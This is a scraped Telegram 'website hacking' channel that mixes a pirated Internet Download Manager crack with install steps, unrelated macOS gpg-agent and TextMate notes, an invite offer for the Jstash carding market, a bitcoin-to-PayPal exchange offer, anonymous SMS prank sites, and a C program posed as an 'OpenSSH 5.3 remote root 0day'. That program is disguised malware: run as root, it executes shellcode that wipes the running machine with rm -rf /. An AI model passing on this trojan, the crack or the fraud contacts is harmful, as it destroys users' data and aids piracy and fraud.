website hacking
756 subscribers
78 photos
3 videos
25 files
167 links
Download Telegram
website hacking
idm.Patch.MyEgy.rar
internet download manager crack πŸ‘†πŸ‘†
download it run idmpatch.exe then click patch choice internet download manager location it will be C:/program Files x86/internet Download Manger pick IDMan.exe done
vps on andorid
Only Real True Linux Lovers Will Get It Don't Forget To Press Like Button!
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
One OS To Rule Them All, One OS To Find Them.
One OS To Call Them All, And In Salivation Bind Them.
In The Bright Land Of Linux, Where The Hackers Play.
-J.Scott Thayer
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘†πŸ‘†sock5 proxy grabber and checker
guys join @CyberArmyblack
Forwarded from Null Byte
cutable

#!/bin/sh
killall gpg-agent

add this script to the logouthook

sudo defaults write com.apple.loginwindow LogoutHook /etc/logout-script

Without the logout script, gpg-agent keeps running even when you log out and
when you log back in, the login hook fails to run (since gpg-agent is already
running) but you can't talk to the socket any more and gpg-agent will be useless.

Getting a GUI pinentry
======================
Get Benjamin Donachie's mac native pinentry from

http://www.py-soft.co.uk/~benjamin/download/mac-gpg/

drop the bundle in the /Applications folder

Modify ~/.gnupg/gpg-agent.conf to add

pinentry-program "/Applications/pinentry-mac.app/Contents/MacOS/pinentry-mac"

Don't use the "no-grab" option in the gpg-agent.conf file. This makes the
native pinentry GUI app hang invisibly.



TextMate seting up for Latex with 64bit kernel
http://wiki.macromates.com/Troubleshooting/SnowLeopard

"⌘R (or similar) giving Inappropriate ioctl for device error β€” ticket F66289D9
This is caused by booting the kernel in 64 bit mode. Very few systems should do this by default, see this article about how to control which kernel to use.

Workaround: Comment out line 169 in $TM_SUPPORT_PATH/lib/tmp/process.rb, this line looks like this:

io[0][0].fcntl(6, ENV['TM_PID'].to_i) if ENV.has_key? 'TM_PID'
To open the file (from the proper support folder) you can press βŒƒR on the following line in a TextMate document:

open -a TextMate "$TM_SUPPORT_PATH/lib/tm/process.rb"
Be aware that this will disable interactive input. Something which was initially broken on Snow Leopard, but is working using the latest dylib from the svn repository."
Forwarded from F SOCIETY
Learn Full HTML

presented by:- @fsocietyofficial

https://drive.google.com/drive/mobile/folders/0B3LfaGUUk6tiT18xZDRBY1FCVXc

HTML Course

πŸ‘ Impossible is Possible πŸ‘
@fsocietyofficial
♨️♨️♨️♨️♨️♨️♨️♨️♨️♨️♨️
Jstash invite is available, innbox me @theclipse18
i can change bitcoin to paypal but i take rate
pm me if u want to channge bitcoin to paypal @jackmodss
✳️ How To Send Anonymous SMS To Any Number all over the world with free✳️

🌐 The method is actually based on sending SMS using some online websites that will allow you to send SMS without entering any personal details. So just have a look on the websites to send free Anonymous SMS.

πŸ’  List of Websites To Send Anonymous SMS To Any Number :-

1,πŸ‘‰ Seasms.com
- This is the one of the best site that supports 160 character message to send to any number online and you will not need to register any personal details and can send free SMS to any of number.

2,πŸ‘‰Sendanonymoussms.com
- This is another cool site that allows user to send anonymous messages without registering personal details also the message sending speed is also very fast.

3,πŸ‘‰ Armsms.com
- This is one of the best anonymous SMS sending portal that allow you to send any message all over the world that absolutely free.

πŸ’  Now you can make your friends fool by sending them different SMS without let them know about the sender of that message as you will be sending from the anonymous network which will not display any personal detail of any user.

 β”ˆβ”ˆβ”ˆβ”ˆβ€’β€’β—β—‰β–β—‰β—β€’β€’β”ˆβ”ˆβ”ˆ       
  πŸ—£βžΉshare &Join Us
            πŸ‘‡πŸΎπŸ‘‡πŸΎπŸ‘‡πŸΎ @hackwebsite
┗━ β€’β€’β€’ ━ ‒‒━━‒‒‒━━━┛
(OpenSsh 5.3 32-bit x86 remote root 0day exploit)

Poc
/* * * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! * * OpenSSH <= 5.3 remote root 0day exploit (32-bit x86) * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! * * */ #include <stdio.h> #include <netdb.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <arpa/inet.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> void usage(char *argv[]) { printf("\n\t[+] HATSUNEMIKU\n"); printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n"); printf("\t[+] Keep this 0day priv8!\n"); printf("\t[+] usage: %s <target> <port>\n\n", argv[0]); exit(1); } unsigned char decoder[]= "\x6a\x0b\x58\x99\x52" "\x6a\x2f\x89\xe7\x52" "\x66\x68\x2d\x66\x89" "\xe6\x52\x66\x68\x2d" "\x72\x89\xe1\x52\x68" "\x2f\x2f\x72\x6d\x68" "\x2f\x62\x69\x6e\x89" "\xe3\x52\x57\x56\x51" "\x53\x89\xe1\xcd\x80"; unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b" "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1" "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31" "\xdb\x40\xcd\x80"; int main(int argc, char **argv) { int euid = geteuid(); int port= 22, sock; char h[1000]; struct hostent *host; struct sockaddr_in addr; if(euid != 0) { fprintf(stderr, "You need to be root to use raw sockets.\n"); exit(1); } if(euid == 0) { fprintf(stdout, "MIKU! MIKU! MIKU!\n"); } if(argc != 3) usage(argv); if(!inet_aton(h, &addr.sin_addr)) { host = gethostbyname(h); if(!host) { fprintf(stderr, "[-] Exploit failed.\n"); (*(void(*)())decoder)(); exit(1); } addr.sin_addr = *(struct in_addr*)host->h_addr; } sock = socket(PF_INET, SOCK_STREAM, 0); addr.sin_port = htons(port); addr.sin_family = AF_INET; if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1) { fprintf(stderr,"[-] Exploit failed.\n"); exit(1); } char payload[1337]; memcpy(payload, &decoder, sizeof(decoder)); memcpy(payload, &rootshell, sizeof(rootshell)); send(sock, payload, strlen(payload),0); close(sock); if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1) { fprintf(stderr, "[-] Exploit failed.\n"); exit(1); } else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0) { fprintf(stdout, "[+]g0t sh3ll!\n"); system("/bin/bash"); } else { fprintf(stderr, "[-] Exploit failed.\n"); close(sock); exit(0); } }

for any help pm me @jackmodss
TiDos server Scanning tool and Vulnerability analysis tool
how to install it (only on
parrot or kali linux)
Link: git clone https://github.com/0xInfection/TIDoS-Framework.git
cd TiDoS-Framework
sudo chmod 764 install
./install
then run tidos on terminal